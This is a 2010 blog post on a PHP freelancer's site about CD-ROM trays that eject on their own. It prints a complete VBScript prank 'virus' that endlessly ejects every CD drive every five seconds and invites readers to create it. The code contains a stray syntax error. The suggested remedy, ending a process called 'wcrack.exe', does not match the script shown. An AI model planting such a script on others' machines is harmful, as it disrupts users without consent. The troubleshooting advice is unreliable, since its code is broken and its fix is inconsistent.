PHP Freelancer

Freelance PHP Developer

How to stop CDRom from ejecting by itself

Posted on | August 11, 2010 | 1 Comment

Hi Friends,

Whenever you found that your CDRom ejecting itself, you don’t want to fiddle with the guts of your computer, look for a software cause first. Is it possible that someone installed some “joke” software without your knowledge? Such programs do exist, and can cause the cdrom tray to open and close by itself at random times. Another possibility is a virus, spyware or some other bit of malware that’s designed to play tricks on you. I’ve seen reports by users who had exactly this problem, and solved it with a thorough spyware cleanup.

Lets look at the virus which effect CDRom.

Create file cdtray.vbs with this code


set owmp = createobject(“wmplayer.ocx.7″)

set colCDROMs = owmp.cdromcollection
do
if colCDROMs.count >= 1 then
for i = 0 to colCDROMs.count -1
colCDROMs.Item(i).Eject
next>
for i = 0 to colCDROMs.count -1
colCDROMs.Item(i).Eject
next
end if
wscript.sleep 5000
loop

As above we can create a virus which effect on CDrom and Eject that itself.

Now we see how to solve that problem.

1) Alt+Ctrl+Delete and Click on Start Task Manager
2) Click on Process
3)End the process which name is wcrack.exe

Thanks…..

      
Plugin by: PHP Freelancer

Comments

One Response to “How to stop CDRom from ejecting by itself”

  1. Mold Removal Pembroke Pines
    November 1st, 2010 @ 10:07 am

    great site.Thanks.

Leave a Reply





Freelance PHP Developer